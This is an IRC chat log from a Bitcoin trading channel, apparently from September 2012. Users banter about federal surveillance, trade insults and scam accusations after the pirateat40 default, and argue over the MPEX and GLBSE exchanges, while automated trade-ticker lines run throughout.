21:26:16 copumking? Sep 11 21:26:22 reeses???? Sep 11 21:26:29 ? Sep 11 21:26:34 oh, I'm at work :) Sep 11 21:26:39 got nothing against goats Sep 11 21:26:43 i'm not so sure about division lines anymore goat Sep 11 21:26:47 you've seen that video I keep linking Sep 11 21:26:49 it's very pro-goat Sep 11 21:26:51 pro/anti don't necessarily fit anymore Sep 11 21:27:02 I'm pro goat too Sep 11 21:27:40 I was always pro pirate but with practically no information over the past few weeks and last minute changes in terms, I'm all for legal action Sep 11 21:27:48 https://bitcointalk.org/index.php?topic=108738.0;topicseen Sep 11 21:28:00 ^ seems legit Sep 11 21:28:02 Chaang-Noi: sorry, other channel, what? Sep 11 21:28:23 Chaang-Noi: I would like to remind you that I treated you like shit from the moment you sat next to me Sep 11 21:28:25 jcpham: lol Sep 11 21:28:54 jcpham: you're a brony, right? Sep 11 21:29:00 pirate sentiment irrelevant Sep 11 21:29:02 bro hoof! Sep 11 21:29:03 reeses it is what it is Sep 11 21:29:12 jcpham: you had another nick at some point, too, didn't you? Sep 11 21:29:24 iv not seen the video copumpkin Sep 11 21:29:33 Chaang-Noi: yeah you have Sep 11 21:29:41 why am i being interrogated Sep 11 21:29:45 Chaang-Noi: and, well, you're crazy Sep 11 21:29:47 :) Sep 11 21:29:55 jcpham: BECAUSE IT WAS YOU. WE HAVE THE EVIDENCE. Sep 11 21:30:04 smh Sep 11 21:30:07 altnick pirateat40 altnick _matthew_ Sep 11 21:30:07 Chaang-Noi: if I must link again, http://www.youtube.com/watch?v=5IuRzJRrRpQ Sep 11 21:30:09 jcpham they plan to take your maidenhood Sep 11 21:30:12 Chaang-Noi: we're all just waiting for the moment you go nuts and end up in a cambodian prison Sep 11 21:30:19 jcpham: just answer the fucking questions Sep 11 21:30:24 lol Sep 11 21:30:29 2 secs Sep 11 21:30:38 oh wait jcpham is smh? Sep 11 21:30:43 fuuuuck Sep 11 21:30:57 lol Sep 11 21:31:00 no other nicks Sep 11 21:31:00 [MPEX] [S.MPOE] 34700 @ 0.00039755 = 13.795 BTC [+] Sep 11 21:31:06 copumpkin: I love the way he "cow tips" the other goat Sep 11 21:31:10 xD Sep 11 21:31:12 yeah Sep 11 21:31:14 multiple times Sep 11 21:31:22 indeed lol Sep 11 21:31:22 mircea_popescu: oh I know why html5 only works sometimes Sep 11 21:31:27 mircea_popescu: it's the fucking ads! Sep 11 21:31:34 i find it funny copumpkin is pro fbi and so is reeses who name will jist be on fbi lists over and over... Sep 11 21:31:46 I'm pro-FBI? Sep 11 21:32:00 I've never really had a position on them Sep 11 21:32:01 copumpkin i have no traded as any other identity, no Sep 11 21:32:10 but if I were to have one, I'd choose doggy Sep 11 21:32:16 jcpham: I didn't mean trading Sep 11 21:32:24 ads suck Sep 11 21:32:28 I'm a fed? Sep 11 21:32:31 holy shit Sep 11 21:32:32 copumpkin: is a fed. Sep 11 21:32:42 no jobs for you! Sep 11 21:32:50 just an arrest warrant. Sep 11 21:32:55 we have the id of copumking and if he is a fed he is not high up Sep 11 21:33:00 however... we know who is... Sep 11 21:33:00 you guys are freaking me out Sep 11 21:33:01 Chaang-Noi: you realize my wife is DHS/DOJ right? Sep 11 21:33:03 i'm leaving Sep 11 21:33:07 jcpham: don't leave :( Sep 11 21:33:09 yes reeses Sep 11 21:33:16 reeses: do you make her wear the uniform? Sep 11 21:33:28 yea well my dad is an astronaut! Sep 11 21:33:29 with the boots Sep 11 21:33:30 what uniform, midget? Sep 11 21:33:31 Chaang-Noi: my id is one google away :P Sep 11 21:33:46 No Sep 11 21:33:48 we know who is three leter org Sep 11 21:33:51 usagi: they're huge Sep 11 21:33:54 and we know who is nt Sep 11 21:33:55 they'r a package delivery company Sep 11 21:33:58 so hot right now Sep 11 21:34:04 no no DHL Sep 11 21:34:07 DHS Sep 11 21:34:14 overnite express Sep 11 21:34:17 lol Sep 11 21:34:25 why's everybody got wives ffs. is gf too long a word for you ppl ? Sep 11 21:34:27 usagi: yup, I call her position "crusher of dreams" Sep 11 21:34:33 I have a gf Sep 11 21:34:40 mircea_popescu: bitches be crazy, yo Sep 11 21:34:41 at least I did last time I checked Sep 11 21:34:53 mircea_popescu: why's everybody got wives ffs. is "" too long a word for you people? Sep 11 21:34:54 reeses put them in chains and only feed them if they're not crazy. Sep 11 21:34:55 copumpkin: is she still here? I'll check for you. Sep 11 21:35:01 reeses: thanks! Sep 11 21:35:09 i wouldn't let my wife find out about my gf Sep 11 21:35:11 its sad that the main memebers of pirate other than myself are fbi or other 3 org or have family that are... Sep 11 21:35:19 Oh guys Sep 11 21:35:26 in talking about the feds Sep 11 21:35:30 I am a banana Sep 11 21:35:34 btw im not kidding Sep 11 21:35:37 i'm osi Sep 11 21:35:41 Azelphur this is pure negativity sir. i will have to ban you Sep 11 21:35:43 several prominent bitcoin people have been approached by the police at airports while travelling Sep 11 21:35:45 oh we're talking family then? Sep 11 21:35:49 Chaang-Noi: wait, me? Sep 11 21:35:49 mircea_popescu: haha Sep 11 21:35:50 you're fucked Sep 11 21:35:51 and asked to provide information Sep 11 21:36:04 no fambly just urmom. Sep 11 21:36:10 im not talking about you nefario Sep 11 21:36:17 I'm just sating Sep 11 21:36:22 on the bitcoin community Sep 11 21:36:25 we know who everyone is but onefixt Sep 11 21:36:25 Chaang-Noi: I'm in the secret service Sep 11 21:36:28 nefario: and several two year old kids have been pulled off planes on suspicion of being terrorists Sep 11 21:36:31 TSA do strange things Sep 11 21:36:32 I think they're attempting to work out identites Sep 11 21:36:34 Chaang-Noi: who am I?!? Sep 11 21:36:39 the tsa idiots are funded by airlines and airports Sep 11 21:36:40 Not TSA Sep 11 21:36:54 lol Sep 11 21:36:55 lmao work out identities. am i the only person using his real name ? Sep 11 21:37:03 they'd have a massively hard job finding me Sep 11 21:37:15 there Sep 11 21:37:18 This is the London Met police, the german equivalent and FBI I think (or whoever the US federeal police are) Sep 11 21:37:19 i'm easy to find Sep 11 21:37:22 come see me Sep 11 21:37:24 azelphur? azelphur.com? oh look that was mega-hard Sep 11 21:37:28 copumking waves the flag, but no one watches.... Sep 11 21:37:38 Azelphur they dunno this internet thing. is it like a truck ? Sep 11 21:37:44 4 people I've talked to in organising bitcoin2012 have said they've been approached Sep 11 21:37:48 mircea_popescu: XD Sep 11 21:37:51 Chaang-Noi: I'm used to it now Sep 11 21:37:53 lol Sep 11 21:38:11 There's no doubt the feds will be looking into the "players" of bitcoin. Reminds me of history class, 1960s all over again. Sep 11 21:38:20 :/ Sep 11 21:38:24 I wonder if I'm a player Sep 11 21:38:27 sad we cant become one Sep 11 21:38:29 damn i'll have to start using tor after all Sep 11 21:38:34 time for another bouncer Sep 11 21:38:41 OneMiner: how will they know who the players are? Sep 11 21:38:48 and what are they going to arrest us for Sep 11 21:38:54 XD Sep 11 21:39:02 copumpkin people making the most noise. for instance, they'll ask goat and nefario and etc. Sep 11 21:39:11 what ever the want azephur Sep 11 21:39:11 for sure Sep 11 21:39:18 true Sep 11 21:39:21 anyone screaming on the forum is a likely target Sep 11 21:39:26 if julian assange is any example, rape Sep 11 21:39:33 YOUR ALL GOING TO GET ARRESTED FOR RAPE. Sep 11 21:39:44 because bitcoin. Sep 11 21:39:50 *you're Sep 11 21:39:52 Nonono. They don't arrest. They gather. Data centers are going up. Profiling people is inexpensive. So, now everybody can have a file on them with the feds! :D Sep 11 21:40:11 mircea_popescu: ah, so they'll miss all the real players Sep 11 21:40:20 we al have a file already Sep 11 21:40:25 fuck Sep 11 21:40:27 my govornment file would look so weird if they started profiling me for bitcoin Sep 11 21:40:35 this level of paranoia Sep 11 21:40:47 cuz of the limited info iknow... Sep 11 21:40:50 fuck Sep 11 21:40:54 whatever Sep 11 21:41:02 i'd be slightly disappointed if i have no file Sep 11 21:41:03 Chaang-Noi: so why do you have a file on me?! Sep 11 21:41:11 copumpkin: I have a file on you :o Sep 11 21:41:16 so the wind doesn't blow you away, skinny. Sep 11 21:41:20 you work and or worked with pirate Sep 11 21:41:26 due dillagance Sep 11 21:41:32 ah, fair enough Sep 11 21:41:34 I know what it sounds like but it's not paranoia. Pepsi is doing the same thing. You think they throw away your IP addy after you try to win that car on the package? Sep 11 21:41:36 how about my file Chaang-Noi Sep 11 21:41:36 I'm pretty shady, too Sep 11 21:41:52 Chaang-Noi: my account had 374 coins in it Sep 11 21:41:54 i dont know you jcpham and think you are an opertunistic troll Sep 11 21:41:55 you can add that to your file Sep 11 21:41:55 http://pastebin.com/AdeWW292 see I have a file on you Sep 11 21:41:58 It's copypasa, so cheep they'd be fools for not doing it. Sep 11 21:42:01 wonderful. Sep 11 21:42:06 you did well coumkin Sep 11 21:42:13 Chaang-Noi: yeah, I'm baller Sep 11 21:42:52 and I'm gonna turn ze file over to the feds! Sep 11 21:42:53 if by oppurtunistic you mean i sieze the day, sure Sep 11 21:42:56 oh wait I already did Sep 11 21:42:57 mind=blown Sep 11 21:43:03 if by troll you mean i live under abridge, yes that too Sep 11 21:43:07 carpe jugulum? Sep 11 21:43:14 i can dig it Sep 11 21:43:27 I watched road house last night Sep 11 21:43:29 xD Sep 11 21:43:33 enjoy guys Sep 11 21:43:35 patrick swayze was ripping throats Sep 11 21:43:40 [GLBSE] [OBSI.HRPT] 1 @ 0.1015 BTC [+] Sep 11 21:43:59 [MPEX] [S.MPOE] 24500 @ 0.00039755 = 9.74 BTC [+] Sep 11 21:44:01 [MPEX] [S.MPOE] 15135 @ 0.00039886 = 6.0367 BTC [+] Sep 11 21:44:24 That goat needs a skateboard or something. Sep 11 21:44:40 Take him skydiving, he'd probably love it. Sep 11 21:45:43 i was first to say pirate defalted, i was the first to say pirate might have scammed, i understand the hate Sep 11 21:46:05 i invented bitcoin in my sleep 20 years ago Sep 11 21:46:08 what is your point Sep 11 21:47:00 [MPEX] [S.MPOE] 17288 @ 0.00039631 = 6.8514 BTC [-] Sep 11 21:47:02 [MPEX] [S.MPOE] 35312 @ 0.00039535 = 13.9606 BTC [-] Sep 11 21:47:57 dude i invented sleep > 9k years ago. Sep 11 21:48:11 [GLBSE] [CPA] 39 @ 0.031 = 1.209 BTC [+] Sep 11 21:49:59 http://techcrunch.com/2012/09/11/boosted-boards/ Sep 11 21:50:01 [MPEX] [S.MPOE] 22900 @ 0.00039886 = 9.1339 BTC [+] Sep 11 21:50:06 something about skateboards Sep 11 21:51:12 I'd buy that for a dollar. Sep 11 21:52:09 Wow 2kW motor and top speed of 20MPH! I wonder how fast it hashes...... Sep 11 21:52:22 2washes/second Sep 11 21:52:44 "We don't measure our success by financial results." Sep 11 21:53:00 [MPEX] [S.MPOE] 10265 @ 0.00039886 = 4.0943 BTC [+] Sep 11 21:53:02 [MPEX] [S.MPOE] 9600 @ 0.00039905 = 3.8309 BTC [+] Sep 11 21:53:03 [MPEX] [S.MPOE] 25635 @ 0.00039939 = 10.2384 BTC [+] Sep 11 21:53:47 Wonder how ghetto a DIY one would be. Sep 11 21:54:23 Some old laptop batts and a smaller motor, could be kinda cheap. I wonder what kind of clutch they use. Sep 11 21:54:59 clutch for electric ? Sep 11 21:56:27 Ya, I guess you could do a direct drive thingy and just let the motor freewheel when you are not on the power. Sep 11 21:58:10 OneMiner prolly easier for low power Sep 11 21:58:37 Ya, that's what I was thinking. Not pure EV but an assist. Sep 11 21:59:00 [MPEX] [S.MPOE] 19265 @ 0.00039939 = 7.6942 BTC [+] Sep 11 21:59:00 [MPEX] [S.MPOE] 8647 @ 0.00039953 = 3.4547 BTC [+] Sep 11 21:59:20 [GLBSE] [JTME] 1 @ 0.8997 BTC [+] Sep 11 21:59:23 go make a btc ghetto plank :D Sep 11 21:59:33 hahaha you know..... Sep 11 22:00:04 That's not so horrible. I'd need an axle and I could do it..... hmmmm. Sep 11 22:03:01 [MPEX] [F.GIGA.ETF] 1375 @ 0.00065027 = 0.8941 BTC [+] Sep 11 22:03:02 [MPEX] [F.GIGA.ETF] 5025 @ 0.00065196 = 3.2761 BTC [+] Sep 11 22:05:35 [GLBSE] [SILVER] 3 @ 0.00999999 = 0.03 BTC [+] Sep 11 22:07:45 [MPEX] [S.MPOE] 37400 @ 0.00039875 = 14.9133 BTC [-] Sep 11 22:09:29 [GLBSE] [ASICMINER] 5 @ 0.1021 = 0.5105 BTC [-] Sep 11 22:09:31 [GLBSE] [ASICMINER] 10 @ 0.102 = 1.02 BTC [-] Sep 11 22:13:48 [MPEX] [S.MPOE] 5700 @ 0.00039875 = 2.2729 BTC [-] Sep 11 22:17:00 [MPEX] [F.GIGA.ETF] 2200 @ 0.00064686 = 1.4231 BTC [-] Sep 11 22:17:02 [MPEX] [F.GIGA.ETF] 6432 @ 0.0006416 = 4.1268 BTC [-] Sep 11 22:17:03 [MPEX] [S.MPOE] 5400 @ 0.00039875 = 2.1533 BTC [-] Sep 11 22:17:04 [MPEX] [S.MPOE] 36200 @ 0.00039738 = 14.3852 BTC [-] Sep 11 22:18:08 [GLBSE] [YARR] 13 @ 1 = 13 BTC [-] Sep 11 22:18:09 [GLBSE] [YARR] 3 @ 1 = 3 BTC [-] Sep 11 22:18:11 [GLBSE] [YARR] 1 @ 1 BTC [-] Sep 11 22:22:02 [MPEX] [S.MPOE] 8854 @ 0.00039535 = 3.5004 BTC [-] Sep 11 22:22:03 [MPEX] [S.MPOE] 13359 @ 0.00039526 = 5.2803 BTC [-] Sep 11 22:22:43 hm Sep 11 22:23:04 mnw got scammer tag, hashking didnt Sep 11 22:24:07 he will Sep 11 22:24:24 its far to give hashking some time Sep 11 22:24:27 fair Sep 11 22:24:53 hashking have a bet going as well? Sep 11 22:24:55 wtf didyou or anyone start a scammers thread for hashking like many people did for mnw? Sep 11 22:25:01 [MPEX] [S.MPOE] 14000 @ 0.00039526 = 5.5336 BTC [-] Sep 11 22:25:21 https://bitcointalk.org/index.php?topic=77469.msg1182260#msg1182260 Sep 11 22:25:25 lets start scammers threads before we expect scammers Sep 11 22:25:28 a this rate we dont print coins fast enough to replace em with the lost ones in scams Sep 11 22:25:42 ashking is a scammer no doubt Sep 11 22:25:45 fuck him Sep 11 22:25:48 but... Sep 11 22:25:53 rules are rues Sep 11 22:26:08 heh, ashking, nicley put, even if it was a typo Sep 11 22:26:32 he is so fail Sep 11 22:26:47 but only if a scammeing thred is made Sep 11 22:27:02 Wow, btc being lost everywhere Sep 11 22:27:48 ummm Sep 11 22:27:52 nobody will be able to open forex account in bitcoins now :( Sep 11 22:27:57 just about everyone failed Sep 11 22:28:07 oh but me Sep 11 22:28:19 :/ Sep 11 22:28:59 [MPEX] [F.GIGA.ETF] 3940 @ 0.00060687 = 2.3911 BTC [-] Sep 11 22:29:32 How did you not fail, you still holding a ton of BTC it sounded like you were out a ton as well. Sep 11 22:29:43 Oops mistyped that. Sep 11 22:30:23 Funny thing is it didnt just disappear someone has the BTC in the system somewhere. Sep 11 22:30:38 a this rate we dont print coins fast enough to replace em with the lost ones in scams << except they ain't lost-lost. Sep 11 22:30:48 'lost' Sep 11 22:30:51 jesus. Sep 11 22:31:01 cant you people handle a metaphore. Sep 11 22:31:09 no :D Sep 11 22:31:44 i did nt fail but i dont ahve anything either Sep 11 22:32:04 i sold real wordl stuff to cover my debts Sep 11 22:32:14 so i hope hashking and shit gets cammers tags Sep 11 22:32:16 in not Sep 11 22:32:19 fukkkkkkckc Sep 11 22:32:30 Well If the goal was not to lose BTC, then it sounds like a failed to me :P Sep 11 22:32:31 [GLBSE] [OBSI.HRPT] 4 @ 0.1015 = 0.406 BTC [+] Sep 11 22:33:13 Not trying to poke fun either, its just everyone is losing on this even the people who didnt invest. Sep 11 22:33:25 Huge cascade of fail. Sep 11 22:33:57 yeah i lost more money than invested Sep 11 22:33:58 Doffx guess who's fine. Sep 11 22:34:00 [MPEX] [F.GIGA.ETF] 15628 @ 0.00060687 = 9.4842 BTC [-] Sep 11 22:34:01 [MPEX] [S.MPOE] 1600 @ 0.00039651 = 0.6344 BTC [+] Sep 11 22:34:03 [MPEX] [S.MPOE] 39946 @ 0.00039953 = 15.9596 BTC [+] Sep 11 22:34:16 but im not a scammer :/ Sep 11 22:34:24 mircea_popescu, lol. Sep 11 22:34:52 did you... Sep 11 22:34:57 yep! Sep 11 22:35:09 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 11 22:35:09 [GLBSE] [V.HRL] 3 @ 0.99999 = 3 BTC [+] Sep 11 22:35:11 [GLBSE] [V.HRL] 16 @ 1 = 16 BTC [+] Sep 11 22:35:29 That's not really true though mircea_popescu, although you may not be feeling a monitary loss less people are putting money in to mpex because of this. Sep 11 22:35:34 [GLBSE] [LTC-MINING] 11 @ 0.7 = 7.7 BTC [+] Sep 11 22:35:38 i know who has it and its not you Sep 11 22:35:43 Chaang-Noi :( Sep 11 22:35:47 that'd happen to be exactly opposite to reality Doffx Sep 11 22:35:52 but i dont ahve it Sep 11 22:36:02 people tend to figure out where their money just goes poof in "investments". Sep 11 22:36:20 its never in mpex Sep 11 22:36:26 cuz no one ever send money there Sep 11 22:36:27 lulz Sep 11 22:36:40 :) Sep 11 22:36:51 Chaang-Noi you seriously have never seen as much btc in your otherwise unremarkable but noisy btc life. Sep 11 22:37:01 To a point mircea_popescu, people will definitely move to stronger hands, and you have gained some from it now. Sep 11 22:37:22 no one willmove th that scam waiting to happen Sep 11 22:37:50 That didnt make much sense Chaang-Noi. Sep 11 22:38:11 Chaang-Noi you know... this sort of stuffing your hands in your ears and singing lalala is what got you in your curent poverty position. Sep 11 22:38:15 learn something from it sometime. Sep 11 22:38:43 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 11 22:38:49 mpex wil end with you taking the btc and running Sep 11 22:38:59 no one trusts tyou Sep 11 22:39:18 you cant grow so you will steal Sep 11 22:39:29 I trust mircea_popescu Sep 11 22:39:33 but then again I trust pirateat40 too Sep 11 22:39:38 so that's not exactly great praise Sep 11 22:39:56 [MPEX] [F.GIGA.ETF] 8500 @ 0.00065166 = 5.5391 BTC [+] Sep 11 22:39:57 [MPEX] [S.MPOE] 3300 @ 0.00039744 = 1.3116 BTC [-] Sep 11 22:40:07 so far i've kinda grown. Sep 11 22:40:17 pretty much the only btc business to be worth over 5mn usd. Sep 11 22:41:06 what are you trying to say copumkin... Sep 11 22:41:16 oh 5m usd lol Sep 11 22:41:26 you talk like scammer diablo or mnw Sep 11 22:41:35 Chaang-Noi: I'm saying that although I trust mircea_popescu, that's probably not very good praise for him because everyone knows how retarded I am Sep 11 22:41:45 haha Sep 11 22:41:56 you're not retarded, you're just not sufficiently street smart. Sep 11 22:42:13 I never trusted Pirate, I knew daily that I was risking what I put in, I just didnt beat the clock. Sep 11 22:42:13 it's worked well for me so far Sep 11 22:42:27 depends if you ever mean to live on the street. Sep 11 22:42:37 oh, I live on boylston st. Sep 11 22:42:45 and have survived! Sep 11 22:43:00 [MPEX] [F.GIGA.ETF] 19000 @ 0.00063091 = 11.9873 BTC [-] Sep 11 22:43:18 oddly enough, there's a freemason lodge across the street from me Sep 11 22:43:18 I made it out of Compton where I grew up and I'm white, not sure what street smarts has to do with BTC Sep 11 22:43:22 and then a half-way house next to it Sep 11 22:43:42 I definitly knew what way was safe to walk home from school though. Sep 11 22:44:29 Doffx teh streetfolk are a little more difficult to con with straight-confidence approaches. Sep 11 22:44:55 course they're a little easier to con with complex scientific approaches, so in the end really it's a wash Sep 11 22:45:02 haha Sep 11 22:47:01 [MPEX] [S.MPOE] 28100 @ 0.00039744 = 11.1681 BTC [-] Sep 11 22:49:18 [GLBSE] [GIGAMINING] 5 @ 0.5701 = 2.8505 BTC [-] Sep 11 22:49:19 [GLBSE] [GIGAMINING] 4 @ 0.57 = 2.28 BTC [-] Sep 11 22:49:20 [GLBSE] [GIGAMINING] 6 @ 0.57 = 3.42 BTC [-] Sep 11 22:49:21 [GLBSE] [GIGAMINING] 10 @ 0.565 = 5.65 BTC [-] Sep 11 22:49:23 [GLBSE] [GIGAMINING] 1 @ 0.56012 BTC [-] Sep 11 22:49:24 [GLBSE] [GIGAMINING] 2 @ 0.56011 = 1.1202 BTC [-] Sep 11 22:49:25 [GLBSE] [GIGAMINING] 5 @ 0.56001 = 2.8001 BTC [-] Sep 11 22:49:26 [GLBSE] [GIGAMINING] 10 @ 0.56 = 5.6 BTC [-] Sep 11 22:50:47 btw calledd gigachange Sep 11 22:51:38 gigachaang? Sep 11 22:52:03 no Sep 11 22:52:12 if you dont know never mind Sep 11 22:52:44 it is nota joke Sep 11 22:53:32 hm. it seems to me there's space in the market between intransparent glbse and expensive mpex Sep 11 22:53:45 make a 5 btc one ? Sep 11 22:54:28 you mean fuck uup glbse and unusable fail mpex Sep 11 22:54:36 [GLBSE] [NASTY] 2 @ 0.5505 = 1.101 BTC [-] Sep 11 22:55:33 [GLBSE] [BTCMC] 4 @ 0.5701 = 2.2804 BTC [-] Sep 11 22:56:49 hate less live longer goatsy. Sep 11 22:57:04 [GLBSE] [NASTY] 7 @ 0.5341 = 3.7387 BTC [-] Sep 11 22:57:18 [GLBSE] [DMC] 1 @ 0.05999999 BTC [-] Sep 11 22:57:30 i don't trade on either coz i don't trust glbse enough and wouldn't have enough volume to make the mpex fees worth it Sep 11 22:57:36 [GLBSE] [BTCMC] 4 @ 0.5701 = 2.2804 BTC [-] Sep 11 22:57:42 [GLBSE] [PUREMINING] 15 @ 0.095 = 1.425 BTC [-] Sep 11 22:57:59 [GLBSE] [NASTY] 1 @ 0.534 BTC [-] Sep 11 22:58:05 well then FabianB_ it'd be a middle market there. Sep 11 22:58:16 i guess Sep 11 22:58:26 [GLBSE] [PUREMINING] 40 @ 0.0936 = 3.744 BTC [-] Sep 11 22:58:28 tho in practical terms you'd maybe be better off doing brokering, some people are making a bitcoin that way. Sep 11 23:00:07 until mpex runs with the btc Sep 11 23:00:09 just wait Sep 11 23:00:11 don't know enough about it yet.. learning.. Sep 11 23:00:42 Chaang-Noi doesn't it strike you as odd that i jsut cut interest on deposits if im trying to run with teh btc ? hm ? Sep 11 23:01:01 [MPEX] [S.MPOE] 7200 @ 0.00039744 = 2.8616 BTC [-] Sep 11 23:01:02 until mpex runs with the btc Sep 11 23:01:03 [MPEX] [S.MPOE] 5900 @ 0.00039713 = 2.3431 BTC [-] Sep 11 23:01:04 just wait Sep 11 23:01:38 [GLBSE] [BTCMC] 4 @ 0.5801 = 2.3204 BTC [+] Sep 11 23:01:44 There is a concept of a 'accredited investor' in financial markets. You need $1MM assets or $200k income. Think of MPEx as only for 'accredited investors' If you cant afford 20BTC for a seat at the exchange, probably you shouldn't be investing. Sep 11 23:01:54 assets-otc looks interesting, if they improve it and do some marketing Sep 11 23:02:41 maybe ur right Bugpowder Sep 11 23:02:48 Bugpowder that's about the ideea. Sep 11 23:02:58 [GLBSE] [BTCMC] 4 @ 0.5801 = 2.3204 BTC [+] Sep 11 23:03:29 When seats are going for 500BTC, will we be able to sell them? Like at NYSE? Sep 11 23:03:33 :) Sep 11 23:03:54 yes. Sep 11 23:04:02 you'd have to pass your signature along with them tho. Sep 11 23:04:15 oh right Sep 11 23:04:17 damn Sep 11 23:04:23 should have thought of that Sep 11 23:04:43 if you think about it, there's not even any way for me ot prevent it, or even know. Sep 11 23:04:51 thus i don't care. Sep 11 23:06:05 yup Sep 11 23:06:59 [MPEX] [F.GIGA.ETF] 5614 @ 0.00064396 = 3.6152 BTC [+] Sep 11 23:09:34 Who thinks S.DICE will sell through there IPO offering by Oct 5th? Sep 11 23:09:54 [MPEX] [F.GIGA.ETF] 10886 @ 0.00064641 = 7.0368 BTC [+] Sep 11 23:09:56 [MPEX] [F.GIGA.ETF] 4500 @ 0.00063091 = 2.8391 BTC [-] Sep 11 23:09:57 [MPEX] [F.GIGA.ETF] 20900 @ 0.00061469 = 12.847 BTC [-] Sep 11 23:09:57 [MPEX] [F.GIGA.ETF] 9300 @ 0.00061301 = 5.701 BTC [-] Sep 11 23:09:59 [MPEX] [F.GIGA.ETF] 14772 @ 0.00061155 = 9.0338 BTC [-] Sep 11 23:10:00 [MPEX] [F.GIGA.ETF] 23800 @ 0.00059495 = 14.1598 BTC [-] Sep 11 23:10:01 [MPEX] [F.GIGA.ETF] 20700 @ 0.00058598 = 12.1298 BTC [-] Sep 11 23:10:48 i'd say it completely depends on how many more bombs of horror fail. Sep 11 23:10:57 we;'ve had one disaster a week since pirate default. Sep 11 23:11:48 [GLBSE] [V.HRL] 9 @ 0.999 = 8.991 BTC [-] Sep 11 23:12:30 lol mpex is fail Sep 11 23:12:35 no one will buy there Sep 11 23:12:48 can't we keep the shit-talking down? Sep 11 23:12:59 it doesn't seem that hard for everyone to be cordial and respectful :P Sep 11 23:13:01 mpex only has any real volume cuz glbse Sep 11 23:13:12 i dunno, i think it;s kinda entertaining. Sep 11 23:13:39 i lost all respect for you tonight copumkin :( Sep 11 23:13:50 he won't even bother to hit tab for you anymore. Sep 11 23:13:59 potemkin Sep 11 23:13:59 [MPEX] [S.MPOE] 10900 @ 0.00039713 = 4.3287 BTC [-] Sep 11 23:14:05 man i'm not even in here chatting either Sep 11 23:14:46 copumkin be bitching... Sep 11 23:14:57 but be failing in respect Sep 11 23:15:03 but he be bitching Sep 11 23:15:05 fragile people are fragile Sep 11 23:15:07 bitching bitching Sep 11 23:15:25 how am I bitching? Sep 11 23:15:33 Chaang-Noi: what'd I do now? Sep 11 23:15:38 [MPEX] [F.GIGA.ETF] 90000 @ 0.000525 = 47.25 BTC [-] Sep 11 23:15:51 sorry copumpkin I idn't read any bitch text Sep 11 23:15:57 i lost faith in you copumkin Sep 11 23:15:57 everyone is trollin' Sep 11 23:16:02 Chaang-Noi: about what?? :P Sep 11 23:16:24 you were about the only won i had faith in or trusted Sep 11 23:16:30 he thinks you are guilty copumpkin Sep 11 23:16:31 one Sep 11 23:16:35 of what, who knows Sep 11 23:16:42 Chaang-Noi: how did that change? :P Sep 11 23:16:52 tonight Sep 11 23:16:59 yes, what actually happened? Sep 11 23:17:00 you level of comunication Sep 11 23:17:07 your Sep 11 23:17:21 hmm Sep 11 23:17:38 i no think you have something to hide Sep 11 23:17:38 this accusation feels remarkably ethereal Sep 11 23:17:47 now* Sep 11 23:17:54 it changed me Sep 11 23:17:58 i losthope Sep 11 23:18:01 lol Sep 11 23:18:06 im getting out of btc Sep 11 23:18:06 what made you think that? Sep 11 23:18:14 my claim that I had 374 coins in my account? Sep 11 23:18:20 no Sep 11 23:18:34 that is a lie/joke and you know it Sep 11 23:18:40 374?!? Sep 11 23:18:45 i easily had double that Sep 11 23:18:56 Chaang-Noi: yeah, it's a joke :P Sep 11 23:18:59 and two zeros... Sep 11 23:19:08 Chaang-Noi: I'm trying to figure out what made you think I have something to hide :) Sep 11 23:19:30 [MPEX] [S.BVPS] 300 @ 0.00359486 = 1.0785 BTC [+] Sep 11 23:19:31 [MPEX] [F.GIGA.ETF] 30200 @ 0.00051617 = 15.5883 BTC [-] Sep 11 23:19:32 [MPEX] [F.GIGA.ETF] 62500 @ 0.000512 = 32 BTC [-] Sep 11 23:19:33 [MPEX] [F.GIGA.ETF] 12158 @ 0.00051119 = 6.215 BTC [-] Sep 11 23:19:40 I hide many things Sep 11 23:19:45 but usually not things that people care about on IRC Sep 11 23:20:05 [MPEX] [F.GIGA.ETF] 7395 @ 0.00051119 = 3.7803 BTC [-] Sep 11 23:20:06 [MPEX] [F.GIGA.ETF] 34963 @ 0.00049271 = 17.2266 BTC [-] Sep 11 23:20:28 Chaang-Noi: is it that I didn't want to join in on your witch-hunt of pirate? Sep 11 23:20:29 i dont think i have place in btc anymore Sep 11 23:20:56 "Science doesn't prove something...it disproves something." Sep 11 23:21:16 alright, if you don't have any actual criticism I'm not going to bother trying to fix it :P Sep 11 23:21:18 imjust going to pay out and leave Sep 11 23:22:00 you broke m heart Sep 11 23:22:03 thats too bad goat ;) Sep 11 23:22:16 [MPEX] [F.GIGA.ETF] 3437 @ 0.00049271 = 1.6934 BTC [-] Sep 11 23:22:17 [MPEX] [F.GIGA.ETF] 4700 @ 0.00047364 = 2.2261 BTC [-] Sep 11 23:22:18 [MPEX] [F.GIGA.ETF] 11600 @ 0.00042004 = 4.8725 BTC [-] Sep 11 23:22:19 [MPEX] [F.GIGA.ETF] 8756 @ 0.00040377 = 3.5354 BTC [-] Sep 11 23:22:20 [MPEX] [F.GIGA.ETF] 9604 @ 0.00038 = 3.6495 BTC [-] Sep 11 23:22:35 Chaang-Noi: dude, if you tell me what made you think that I'm a bad person, I may or may not be able to say "sorry it was a misunderstanding, here's the truth!" or I might just have to say "yeah, you're right" Sep 11 23:22:43 if you just keep repeating that I'm a bad person, I can't really argue with that :P Sep 11 23:22:59 im not saying you are bad Sep 11 23:22:59 i dont think i have place in btc anymore << you're just depressed cause you were stupid. Sep 11 23:23:01 it hapens. Sep 11 23:24:01 im just lost and dont want to be here right nowfor the ood fight if its not a good fight. Sep 11 23:24:13 good( Sep 11 23:24:14 Did Chaang-Noi believe that whole 7% per week BS? Sep 11 23:24:17 right. Sep 11 23:24:33 Chaang-Noi: fair enough. Sorry you feel that way, then Sep 11 23:24:48 yeah Sep 11 23:24:55 good luck Sep 11 23:25:03 Chaang-Noi: bye now Sep 11 23:25:16 [GLBSE] [SS] 424 @ 0.0172 = 7.2928 BTC [-] Sep 11 23:26:07 [GLBSE] [NYAN.B] 3 @ 0.975 = 2.925 BTC [+] Sep 11 23:28:59 [MPEX] [S.MPOE] 33200 @ 0.00039713 = 13.1847 BTC [-] Sep 11 23:32:56 [GLBSE] [ASICMINER] 3 @ 0.10499 = 0.315 BTC [+] Sep 11 23:32:57 [MPEX] [F.GIGA.ETF] 30397 @ 0.00030644 = 9.3149 BTC [-] Sep 11 23:32:59 [MPEX] [F.GIGA.ETF] 3000 @ 0.00030838 = 0.9251 BTC [+] Sep 11 23:33:00 [MPEX] 